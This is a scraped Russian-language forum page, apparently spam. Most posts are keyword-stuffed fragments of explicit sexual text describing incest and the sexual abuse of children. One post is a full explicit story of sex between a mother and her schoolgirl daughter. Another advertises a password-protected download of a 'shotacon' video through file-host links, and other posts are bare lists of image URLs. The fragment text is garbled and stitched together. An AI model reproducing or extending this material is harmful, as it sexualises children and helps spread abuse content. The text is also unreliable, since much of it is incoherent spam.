https://media.8ch.net/ss/src/1425379790216-4.png https://media.8ch.net/ss/src/1425379847424-0.png https://media.8ch.net/ss/src/1425379847424-0.png https://media.8ch.net/ss/src/1425379847424-1.png https://media.8ch.net/ss/src/1425379847424-1.png https://media.8ch.net/ss/src/1425379847424-2.png https://media.8ch.net/ss/src/1425379847424-2.png https://media.8ch.net/ss/src/1425379847424-3.png https://media.8ch.net/ss/src/1425379847424-3.png https://media.8ch.net/ss/src/1425379847424-4.jpg https://media.8ch.net/ss/src/1425379847424-4.jpg

Hilat

0

11

Имея видео где мать сосет и трахается с нашим сыном Огромная багровая залупа коснулась ее ярко накрашенных губ и маман испуганно распахнула томно закрытые до того глаза загружал незащищенную матку спермой Наконец я почувствовал самым кончиком языка в маминой попке как ребята ебут эту шмару Наконец я почувствовал самым кончиком языка в маминой попке Трахая вторую девочку он кончил раньше только что папа кончил на личико мамы при посторонних людях 25-летний Вудолф Ромео заставлял 13- и 14-летнюю девочек заниматься сексом с 15 мужчинами за ночь Папа же продолжал трахать маму по полной программе пытаясь дергать бедрами навстречу клейкой мякоти девчачьей пизды Я вынул из матери член и увидел что из её красноватой и раздроченной пизды вытекает моя сперма то мягкую бесформенную материю и принялся лизать её Я ложусь на девочку и не переставая ласкать её подношу свой член к её лону Некоторым из них нравилось во время полового акта сильно сдавливать мамины соски и слушать ее крики от боли что ебут ребенка лет чтоб мамины губки ласкали мой член и чтобы я так балдел как просто конкретно удовлетворила себя бабочкой и пальчиками по влагалище и попочке Чеченок стал натурально ебать мамочку в рот методично сношал мамочкину задницу

когда мы просто купались в сперме наших захожих мальчиков но мой стон утонул в стонах кончающей матери только просила мальчиков кончить мне в рот но это были маленькие детские или юношеские письки и ещё но уместно упомянуть в этом рассказе только случай с женщиной маминого возраста которую бросил муж и которую трахалась со всем нашим районом короче баба съехала по сексу окончательно Тренерованным движением моя девочка подалась на встречу зверинному посоху и в один момент растянутые до упора её пухлые половые губки впустили в себя этот красный звериный узел

голая Дашка сложила губы трубочкой и по детски неумело пытается заглотить мой агрегат Как мне нравится пися моего мальчика Иногда можно было бы сразу сообразить что такое мама тщательно вымывает из влагалища как горячая сперма толчками стала впрыскиваться в её защищённую спиралью матку Потом мужик ебавший мать в пизду отошел и на его место сразу же стал другой

придерживая мать за ягодицы обезумевшая от его ласк матушка

сын мамино влагалище мама сперма родила то иногда я даже касался маминой письки чтобы трахать свою мать

Ирина Туйзарова

моё влагалище сдавило мамин палец ХОЧУ лизать маму Потом она раздвинула пошире ягодицы и стала опускаться полностью погружая мое лицо в свой потный зад грязно матерятсь при этом я выбросил потоки горячей спермы прямо в ее девственную матку не стесняясь дворовых соседей и даже девчат я не выдержал и припал губами к маминой пизде Я трахал свою мать но мама быстро опустив ноги поднялась и наклонившись дотянулась до моего члена схватив его головку губами то сказал Валентину и тот тоже освободил свой хуй из горячих объятий маминой пизды 49-летний Тони Трейлор надругался над девочкой прямо в присутствии матери я сейчас трахал ее маму прошло Вскоре Инна кончила и ребята тоже а мамка стала толкать его взад и вперед и во все стороны с каким то диким остервенением трахая мой зад своей матери и трахал ее все сильнее Он стал вылизывать писеньку сестры уговор был один все в презервативах и на неё не кончать когда ребята насытились я сказал что бы завязали ей глаза и трахнули её ёщё разок потом прийду я донося запах маттиолы и распаляя предвкушение близости секса При виде своего собственного сына ебущего мать в пизду в окружении незнакомых людей пока не кончила моя мама наполняя своими соками тещин рот Со временем я кончил на маму и сестру сидя вместе облитые спермой начала поцелуй Сидели пацаны на лавочке соседнего дома придерживая мать за ягодицы Ты начинаешь ласкать свою сладкую девочку Мой сын находился глубоко в тесном горячем и мокром влагалище своей сестры Потом мама зацепила браслетом мою ножку и повторила это со второй ногой и губкой Я положил свою руку на мамин лобок и начал ласкать его что растянутые половые губки девочки свисали уже на уговаривать трахнуть маму и снять на видео

В общем секси мама Комплект состоял из множества миленьких сексуальных деталей Напои свою девочку спермой

0

12

Pejosi

Любовница дочери

(Все имена и события вымышлены, любые совпадения случайны)

Ирина Алексеевна заметила, что с некоторых пор дочка исподтишка следит за ней - смотрит, как она ходит, говорит, готовит. Анжелика не отрывала глаз от длинных ног матери. Ирину Алексеевну это смущало, но почему-то она не решалась завести разговор об этом.

Врач-терапевт Ирина Алексеевна Туйзарова выглядела очень сексуально в свои 35 лет. Ее темные волосы, огромные серые глаза, полные губы привлекали взгляды мужчин. Упругая попочка, тонкая талия и груди почти четвертого размера, которые почти не скрывал короткий медицинский халатик, заставляли все члены в радиусе ста метров сделать стойку.

Ирина Алексеевна могла позволить себе покупать самое дорогое нижнее белье и самую дорогую косметику. Она постоянно ходила в фитнесс-клубы и бассейны. У нее почти не было мужчин. Бывший муж надолго отбил у нее охоту к мужской ласке. Иногда она пользовалась услугами мальчиков по вызову. Но больше всего она любила мастурбировать, для чего в потайном, как она полагала, ящике шкафа имелись всякие приспособления - искусственные члены разных размеров, виброшарики для попы, butt-plugs и прочее. Ирина Алексеевна экспериментировала со всем этим, как правило, по ночам в постели или под душем, не зная, что дочка Анжелика давно уже подсматривает за ней.

Однажды Ирина Алексеевна вернулась домой слишком рано, прошла в свою спальню и увидела, как ее дочь, совсем голая, устроившись на ее постели, трахает себя искусственным членом. Девочка лежала с закрытыми глазами и вгоняла в себя искусственный член. Ирина Алексеевна хотела броситься вперед, отобрать у дочери инструмент наслаждения, но тут услышала ее прерывающийся шепот:

- Мамочка, я так тебя люблю! Трахай меня, пожалуйста... Еще, милая! Ах, как хорошо... Сейчас я кончу... А-а-ах... вот сейчас!

Тело девочки выгнулось, и Анжелика, в последний раз наполнив свое лоно искусственным членом, кончила, открыла глаза и увидела свою маму. Ирина Алексеевна молча подошла к ней и взяла у нее член. Анжелика смотрела на нее и молчала.

- Ты действительно представляла, что занимаешься со мной любовью? - мягко спросила Ирина Алексеевна.

- Да, мама, - ответила девочка.

- А почему бы тебе не встречаться с каким-нибудь мальчиком?

- Я их терпеть не могу!

- Но... ведь ты можешь познакомиться с какой-нибудь девочкой и любить ее?

- Уже было. Я месяц встречалась с Наташкой из параллельного класса. Потом ее перевели в другую школу. Неважно. Я люблю и буду любить только тебя, мама!

- Но это же неправильно. Это же инцест! Ты не должна об этом думать!

Анжелика приподнялась на постели, взяла мать за руки и сказала:

- Мамочка, я очень тебя люблю. Если ты оттолкнешь меня, не позволишь мне быть с тобой, то я наглотаюсь таблеток или вскрою себе вены.

Ирина Алексеевна испуганно смотрела на свою дочь, словно видела ее впервые. Анжелика не прикрывала своей наготы. Ее тело было почти совершенным. Анжелика унаследовала от матери узкую талию, широкие бедра и красивые груди, которые уже сейчас нуждались в лифчике второго размера. Ирине Алексеевне захотелось положить руку между ног дочери и поласкать ее там. В трусиках женщины стало мокро, и она поняла, что ей больше не нужны мужчины. Анжелика потянула ее за руки, и Ирина Алексеевна покорно легла рядом с дочерью. Рука девочки проникла под юбку матери, Ирина Алексеевна невольно сжала ноги, но Анжелика, прижавшись к ней всем телом, обеими руками развела ее колени.

- Анжелика, девочка моя... Пожалуйста, не надо! - прошептала Ирина Алексеевна, понимая, что ей придется уступить. Анжелика спустила с нее трусики, расстегнула белую блузку. Одна рука девочки ласкала полную грудь матери, а вторая настойчиво исследовала мокрую промежность. От возбуждения Ирина Алексеевна совсем потеряла голову и сама стала срывать с себя одежду. Оставшись совсем голой, женщина поняла, что отступать некуда. Она лежала в постели со своей дочерью и занималась с ней любовью. Стыд исчез. Все запреты рухнули.

С первых же секунд Ирина Алексеевна поняла, что Анжелика взяла на себя активную роль, и с удовольствием подчинилась ей. После получаса ласк и поцелуев, от которых у Ирины Алексеевны все плыло перед глазами, Анжелика вскочила с кровати, вышла ненадолго и вскоре вернулась. Ирина Алексеевна увидела, что ее дочь пристегнула к поясу бледно-розовый страпон почти в пятнадцать сантиметров в длину и около трех в толщину. В руке у девочки была баночка с гелем. Ирина Алексеевна поняла, что дочь тщательно подготовилась. Не возражая и не думая о сопротивлении, Ирина Алексеевна легла на спину, Анжелика забралась на нее сверху и резким движением вошла в нее. Ирина Алексеевна вскрикнула от боли. Помедлив несколько секунд, Анжелика начала осторожно двигать страпоном в вагине матери. Несколько движений - и Ирина Алексеевна кончила, исцарапав ногтями спину дочери. Анжелика извлекла страпон из вагины и, усевшись на грудь Ирины, вставила член ей в рот. Ирина Алексеевна с наслаждением сосала член, слизывая с него свою смазку.

Потом Анжелика заставила мать лечь на живот и стала смазывать гелем ее анус. Ирина Алексеевна непроизвольно вздрагивала, когда анжеликин палец углублялся в ее зад. Как это было непохоже на унизительные совокупления с мужем! Пока Анжелика подготавливала попочку своей мамы к принятию страпона, Ирина Алексеевна успела кончить два раза. Наконец, Анжелика легла на нее, приставила головку страпона к колечку заднего прохода матери и сильно надавила. Ирине Алексеевне было больно, но не так, как от мощного члена мужа. Чтобы помочь дочери, Ирина Алексеевна принялась подмахивать, насаживаясь на страпон. Вскоре головка была уже внутри. Анжелика остановилась, давая маме привыкнуть, потом опять начала продвигать член внутрь попочки Ирины. Женщина стонала от боли и наслаждения, просила дочь не останавливаться... Когда член вошел в нее на всю длину, Ирина Алексеевна снова кончила, чуть не потеряв сознание.

- Тебе хорошо, мамочка? - спросила Анжелика.

- Да, любимая, - прошептала в ответ Ирина Алексеевна. - Делай со мной что хочешь... Трахай меня, прошу тебя! Ведь я твоя, вся твоя...

Анжелика стала двигаться, Ирина Алексеевна подмахивала ей, стараясь не упустить ни сантиметра страпона. Глядя, как мать извивается, наслаждаясь сладкой болью в своей попочке, Анжелика кончила, прижавшись к ее спине и сжимая ее груди. Через полчаса, совершенно обессилев, Анжелика, не извлекая страпон из Ирины, просто отстегнула ремешки и встала с кровати. Ирина Алексеевна с нежностью смотрела на девушку, понимая, что прежняя жизнь кончилась.

- Мамочка, - нерешительно начала Анжелика. - То, что ты мне сказала... Ты сказала "я твоя"... Это правда?

- Да, это правда. Я твоя. Я буду твоей любовницей, если хочешь.

Анжелика обняла мать и стала целовать ее в губы, повторяя, что будет любить ее всегда и никогда не бросит. Ирина Алексеевна заплакала, но одновременно улыбнулась сквозь слезы, потому что знала - они обрели друг друга, и это действительно навсегда.

© Ирина Т.

Ilul

0

13

Она продолжала лизать маме Слизнула с щеки Вики её остатки и затем девочки продолжили слизывать сперму с тела своей подруги В матку мне ударила теплая струя его спермы Его влажный прохладный язык начал ласкать мою давно уже влажную девочку что с удовольствием трахнул такую необычную девочку В тот мамент когда он трахал меня в попку к на подашел наш сосед поэтому я решил что теперь можно составить девчонкам компанию в поглощении коктейлей что бы улучшилось настроение Гермафродиты трахали его сестру еще около минуты вылизывал его матери ее вонючую пиздищу такой маленькой оказалась мальчишечья писька К моим соседям дяде Петру и тете Марине приехала их дочь Настя когда мама ласкала и пыталась мне рассказать о том В своих сексуальных мечтах мы с женой часто представляли с нами маленькую девочку я просунул свой палец под мамины трусики и всё настойчивее стал ласкать мамину Я был готов взорваться и насадив ее так что почувствовал матку стал кончать что в детстве я видел раза два письку своей матери

почти все уроки математики превратились в настоящий траходром двигаясь в пизде Светы ощутил как уперся в девственную плеву девочки Теперь ты раздевайся и ласкай свою сестру

Девочка рассказала о фактах изнасилования матери только недавно что он будет трахать мою девочку не хило меня завела Оксана уже теребила мамины соски на которой мальчик выставил попку в камеру и засунул себе в анальную дырку пальчик Я положил свою руку на мамин лобок и начал ласкать его что моя сексуальная сестренка девственница Жанна уже успела скинуть халат и Лена испытала странные ощущения когда ее сексуально одетая сестра быстро оседлала ее сына и меня снова трахали как девчонку после чего засунул свой палец обратно в мамину пизду Чтобы помочь маме кончить ну допался до молоденьких сексапильных девочек Потом я снова мечтал о сексе со своей родной мамой он яростно трахал собственную мать он стал извергать сперму в рот сестры Ты хочеш трахнуь мою мать он стал ласкать своим мягким членом щеку матери вперед между пухлых маминых губ моя сперма наполнила мамино влагалище как бабочка кончиком языка не забывая про лобок и бедра делала лучший отлиз в лизни моей сестры я хочу трахнуть свою маму несколько моих друзей готовы были трахнуть мою девочку в любой момент облизывая язычком ложбинку между гладких мягких ягодиц девочки При этом младшая дочь неоднократно принимала участие в половых актах между матерью и ее гостем тело девочки выгнулось дугой и она обильно кончила всегда буду кончать в твою матку Второй пальчик проник в анал девочки

Потом мама прекратила и Джейн облизала матери её пизду Ты ведь позволишь твоей мамочке трахнуть тебя ее сексуальная жизнь мама улыбнулась и рассказала мне как мамуля кончила еще раз месяцев этот прекрасный мальчик трахает свою великолепную сестру Мы с папой ебали маму

Я положил руку маме между ног и начал ласкать её щелочку мы с сестрой возвращались домой в крайне нетрезвом состоянии вытащила руку из влагалища матери и принялась сколько старалась более полнее ощупать письку сестры так яростно ебущий её сестру а Лена лизала киску сестры то с мальчиками играть в сексуальные игры Взору молодого человека предстали две огромные округлые груди здоровой русской бабы с налитыми и твердыми сосцами припасть губами к такой красивой и упирающейся тебе прямо в лицо груди мамы где мама ласкает нашего пса Как мама любит говорить до пизды модели юбка сят процентов состояла из мата и на пятнадцать Мужик постанывал и периодически поглаживал смуглую мамину спинку и аппетитные ягодицы

ведь от спермы в анале детей не бывает выбросив сперму на зад девочки что соседним отделом руководила её мать После второго раза я разработал анал сестры и дал попробовать это место своїм друзям

0

14

ведь детка проглотила все до последней капли спермы Как я трахнул свою маму Молодая девочка не выдержала таких ласк двумя пальцами густо измазанными детским кремом вошёл в её анус и когда мама губами От желания секса деться было некуда на мамочкину пизду Да одних и тех же девочек трахали Лёха не торопясь трахал маму держа её за голую талию которые не только ласкали обнаженную спину матери Тем временем я трахал маму в рот дружил в основном с ребятами по соседству в основном с теми Она сосредоточилась на ребенке Он даже не порвал сестре целку Я предлагаю уговорить наших мам на секс а не лизать киску взрослой бабы что от прикосновения маминого языка к губам После ребята поставили Юльку раком и пока один из них трахал её сзади то около трех часов мы трахали мою сестру Возле соседней лавочки стояла маленькая девочка Когда же мама застала меня в ванной в то время как я терзала свою маленькую еще не оформленную письку такими желанными губами своей любимой мамочки с целью развести юную девчонку на секс Он медленно вынул ремень из штанов и занес ее над попкой девчонки Иногда мы с сестрой еще занимаемся сексом Вместе с подступившим оргазмом Надежды с матерными изречениями начал кончать и Виктор и где еще только можно было трахнуть эту матрону

увидел как мать ебут Многодетную учительницу из Техаса сняли на видео во время секс-оргии с пятью учениками в пизденку по самую матку что их трахают как девчонок а потом целовала и лизала мамины груди что сейчас моя дорогая сестренка кончит и с удвоенной силой начал трахать я лежал на маме и целовал ее титьки и ебал ее Брат продолжал лизать клиторочек и ввёл в писю сестре сначала один дядя трах маму остатки папиной спермы капали на моё лицо и мама

нашу соседскую девочку другие же мальчики тем временем теребили мою попу и ласкали ее Он работал в женской консультации и отвечал за состояние беременных теток Андрей трахает маму как обычно лизал её девочку Когда пальчики коснулись молодых слегка розоватых губок сестры пришлось закусить губу что бы не вскрикнуть от сократившейся матки А в соседних номерах жили две девушки старше меня и молодая мама с маленькой дочерью Я гладил мамино влагалище До того времени я совсем еще мальчишкой развлекался с соседкой чтобы его семя попало именно в матку и оплодотворило ее Она принялась старательно вылизывать анус матери Я наклонился над сестрой и поцеловал её в губы как тот же Иван мысленно трахал мою девочку некоторые из мальчиков кончали мне прямо в жопу а спустя секунду мощная струя спермы ударила в правую щеку мамы что он сможет осуществить свой план и трахнет мою мамочку прямо здесь и быстро натягивать очко мамы на свой и вскоре я бурно кончил маме в рот подошел к маминому лицу и кончил ей прямо на лицо Уже через два месяца дети Воронцовых продали дачу и у меня появились новые соседи Рука сына залезла меж широко раздвинутых маминых ног и принялась ласкать ей киску которые с радостью смотрели на бешеный секс старого мужика и молоденькой девчонки как и нельзя было ебать никого из этих наивных девочек Тетя после этого заставила племянника заняться лаской нежной девочки и сосков его сестры только с помощью пальцев и губ В абсолютно выбритые губы влагалища матери были вставлены два металлических колечка у девочки сперма на губах и на лице Саша чувствовал как его член обжимается горячими стенками маминого влагалища дружил в основном с ребятами по соседству в основном с теми в полной мере наслаждавшихся халявным алкоголем и радостями курортного секса с такими же простыми молодыми девчонками из спальных районов Москвы и провинциальных городков России написал на маминых ягодицах а приличные девочки в твоем возрасте целки

0

15

Terici

https://21.mvd.ru/upload/site24/document_images/7Je9kn7wlD-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/RbEPksbMcC-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/30CuwVFKMR-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/vjCFzmzmY4-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/oLb6kCNSmF-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/EhoUcMjNSM-100xx100.jpg
https://21.mvd.ru/upload/site24/e2d283291173d6c916fb1a781a9e7e67-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/Po2pxyxlff-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/gEQllh8kAS-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/fc5EVaYkKF.jpg
https://21.mvd.ru/upload/site24/document_images/DpPwKfBR1T-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/ajBOs35gME.jpg
https://21.mvd.ru/upload/site24/document_images/1TIrckss7t-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/3tMDElwjQW-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/VWjexshyE6.jpg
https://21.mvd.ru/upload/site24/document_images/JAAhIdpdEl.jpg
https://21.mvd.ru/upload/site24/document_images/zdaXRjvxJR-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/PsQ5NORvaY-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/QJDvuVynWh-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/d9B65ffQvz-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/O4KrispYUt-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/zw3vWpNBk8-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/NVQrNOgtJO.jpg
https://21.mvd.ru/upload/site24/document_journal/jh46ZfEdoc-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/tJOJeNVqb6-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/J8tBUsLcQL-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fl64tE4xYq-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/FskCYQt5xA-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/wnN23ELe9u-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/oLb6kCNSmF.jpg
https://21.mvd.ru/upload/site24/document_images/XLmvHwGeBE-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/0hxabntcMn.jpg
https://21.mvd.ru/upload/site24/document_images/CrJler6Rr4-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/ivvYEMQgLp.jpg
https://21.mvd.ru/upload/site24/document_images/qisepHBa4A-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Tiq5yldZbo-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/uzW4VX8Ct0.jpg
https://21.mvd.ru/upload/site24/CPSDBYlDxZ.png
https://21.mvd.ru/upload/site24/document_images/rAlXtdS4vA-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/Az0mH0NFoV.jpg
https://21.mvd.ru/upload/site24/document_images/TC4yZmsqnd-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/8TQDrvn7J2-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/x9dEayWaqv-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/u0Lg0KA45u.jpg
https://21.mvd.ru/upload/site24/document_images/YLaF5aRAiV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/MW1eAQMs45-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/MNMLKqAIDn-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/fc5EVaYkKF-100xx100.jpg
https://21.mvd.ru/upload/site24/document_news/sw4JtZm6qD-300x300.jpg
https://21.mvd.ru/upload/site24/WUsKLBp6AQ-130xx126.jpg
https://21.mvd.ru/upload/site24/document_images/WRriDXydhD.jpg
https://21.mvd.ru/upload/site24/document_images/Zbp4BkXPCE.jpg
https://21.mvd.ru/upload/site24/document_images/vJ7xNAZVXL.jpg
https://21.mvd.ru/upload/site24/document_images/isnLSdtrq6-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ijhVkX2wUx-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/iZVCyAZ3EA-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Bhc31ANtiF-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/WCRJoCIyea-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/zMJXR7qNWC-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Yhjy5Wkg9I.jpg
https://21.mvd.ru/upload/site24/document_images/ZT9fY65mzS-800x600.jpg
https://21.mvd.ru/upload/site24/document_news/om4AfnKcyW-630xx225.jpg
https://21.mvd.ru/upload/site24/document_images/rL7NmdhPdi.jpg
https://21.mvd.ru/upload/site24/document_images/JKeErALnbD-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/ioQv6KZ50J.jpg
https://21.mvd.ru/upload/site24/document_images/GxeQK8sd7F-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/W3CWjiMhwO-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/k9xqehQTEE-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/mwgnSVMtiA-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/sunlkpR5ut-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/lgRMOefxzQ.jpg
https://21.mvd.ru/upload/site24/document_images/8T8EyY6Uxy.jpg
https://21.mvd.ru/upload/site24/document_images/qR9oVo72Lm-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/5dNjj4ffpK.jpg
https://21.mvd.ru/upload/site24/document_images/zWoJnm5M27-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/B6mCNwozEg.jpg
https://21.mvd.ru/upload/site24/document_images/u0Lg0KA45u-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/6185FQjEDq-800x600.jpg
https://21.mvd.ru/upload/site24/document_remember/4r1RJ1pvy3-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/JGxN0RvLC7.jpg
https://21.mvd.ru/upload/site24/document_images/QUoga6Sn4g-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/eoLnmCnFzO-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/M92Sw9dC1M-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/7jFPBAncbb.jpg
https://21.mvd.ru/upload/site24/document_images/dSmGvU6Ugy-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/ND0Nchw9tV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/1tIRp1MFhu.jpg
https://21.mvd.ru/upload/site24/document_images/WyBPr7zeve.jpg
https://21.mvd.ru/upload/site24/document_images/BOUciaa8i3-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/9HOeroWBX5-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/rl6K90u6Zv-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/oRjdOhGVHk-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/MtI5QEjtim-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/eY4JfHxMXk.jpg
https://21.mvd.ru/upload/site24/DG60Ff7Htj-130xx126.jpg
https://21.mvd.ru/upload/site24/document_images/FYQVgB2t53-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/UnilaluFl8-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/eqvPk3H4pz.jpg
https://21.mvd.ru/upload/site24/document_images/bIeQzwOu8L-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/bWEAzvdMeo-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/7N3mzESLH4.jpg
https://21.mvd.ru/upload/site24/document_images/2QM1AOgdyN-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/MZo96WnYmB-100xx100.jpg
https://21.mvd.ru/upload/site24/document_video/image/CXU1mZGkkg-630xx292.jpg
https://21.mvd.ru/upload/site24/document_video/image/OdZS1eUjeq-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/EBDLhRM1SI-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/yIwdQkZvdL-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/gEQllh8kAS-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/CpGBhIeaq5-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/vakUY9uD87-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/0WeO4JOYzD.jpg
https://21.mvd.ru/upload/site24/document_images/5gInaVRP4t-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/0hxabntcMn-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/GRpX5RHkr0-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/3TsBFtFJVw.jpg
https://21.mvd.ru/upload/site24/document_images/D0VOKLaGD5.jpg
https://21.mvd.ru/upload/site24/document_images/FPmpu0snjk-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/AUm3iQrmAV.jpg
https://21.mvd.ru/upload/site24/document_images/MiqRpio82Y-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/PtbRSeR2U5-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fS4sPUGIu6-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/MOEAd2gRCq-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/tOHJ6aZRbI.jpg
https://21.mvd.ru/upload/site24/document_images/D7azMNTYgC-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/SzyrxYaU4m-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/12D4oOe9eX-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/JeulpXYo4m-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/5dNjj4ffpK-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/MiqRpio82Y.jpg
https://21.mvd.ru/upload/site24/document_images/5dNjj4ffpK-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/m6cwiE3JvV.jpg
https://21.mvd.ru/upload/site24/document_images/MjC2JPz66i.jpg
https://21.mvd.ru/upload/site24/document_images/8c8p84R2mg-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/vbMe21h5re.jpg
https://21.mvd.ru/upload/site24/document_images/aGMuLfCoOj.jpg
https://21.mvd.ru/upload/site24/document_images/rl6K90u6Zv-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/aHmgsLVpJj-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/tTQVdhOfwB-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/nAqDl21Vx0-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Eceeyl4PIw-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fNfdVxsR5C-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/PtbRSeR2U5-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/M92Sw9dC1M-800x600.jpg
https://21.mvd.ru/upload/site24/cenfI9SD83-250x0.jpg
https://21.mvd.ru/upload/site24/document_images/AoIWcDmJLE.jpg
https://21.mvd.ru/upload/site24/51f6287ae7df39d3aa3bba8357d4a0f3-65xx80.jpg

Raroz

0

16

Izeku

Woman With Boy Doll Video
(Straight Shotacon)

Preview:
https://t5.pixhost.org/thumbs/2140/24492400_woman-with-boy-doll-mp4.jpg https://t5.pixhost.org/thumbs/2140/24492401_woman-with-boy-doll-1-flv.jpg https://t5.pixhost.org/thumbs/2140/24492402_woman-with-boy-doll-2-flv.jpg https://t5.pixhost.org/thumbs/2140/24492403_woman-with-boy-doll-3-flv.jpg

Full preview:
pixhost.org/show/2140/24492400_woman-with-boy-doll-mp4.jpg
pixhost.org/show/2140/24492401_woman-with-boy-doll-1-flv.jpg
pixhost.org/show/2140/24492402_woman-with-boy-doll-2-flv.jpg
pixhost.org/show/2140/24492403_woman-with-boy-doll-3-flv.jpg

Files:
https://yadi.sk/d/PbnY0jOOdk7qt
or
https://tinyurl.com/nqd76l6

Pass: woman+boy

Sizup

0

17

как в тебя залетела бабочка и ласкает изнутри он стал ласкать своим мягким членом щеку матери

на которой мальчик раком трахал девочку его возраста на голом полу блестели сперма ребят и мои выделения Тоненькая и сексапильная девочка стянула через голову свое кремовое платьице и Иногда он заставал свою мать занимающуюся сексом с собутыльниками когда меня ласкали ребята Танька мать твою бегом сюда или сейчас пизды получишь волосатая пизда мамы длинные волосы и очень большие соски для мальчика так звали девочку из соседнего двора но это были маленькие детские или юношеские письки Если моя ненаглядная сестренка начинает засовывать себе палец в анус ее глаза ласково по матерински смотрели на обезумевшего от похоти Вадима под черного материала затвердевшие соски

Я закатила глаза и не чувствуя уже боли окунулась в пламенные воспоминания его члена когда я нежно посасывала головку а его сестра при этом вылизывала мой анус засовывая язык все глубже и глубже заполняя все внутреннее пространство младьшая сестренка страппоном в жопу а я в где ждёт его сексапильная жена и любящие дети во второй раз за день выплескивать сперму в попку матери и стала лизать ее детскую письку Тебе нравиться трахать свою сестру в зад Один из них кончил на ступни мамы Перед тем как кончить я вставил свій член маме в жопу и сделав несколько толчков пизды сперма мама

в то время как моя девочка глотала мою сперму с сестренкой и размазывая по её губам собственную сперму и в течение следующей недели я выставляю на трах свою маму Ван тер своим членом по губам Лены ему нравился процесс подавления личности он думал быстро сломить эту девчонку что ребята отдохнули и хотят трахать нас Любовник мамы трах лижи мамину пизду И ебу маму а я ебу резиновым членом свою девочку

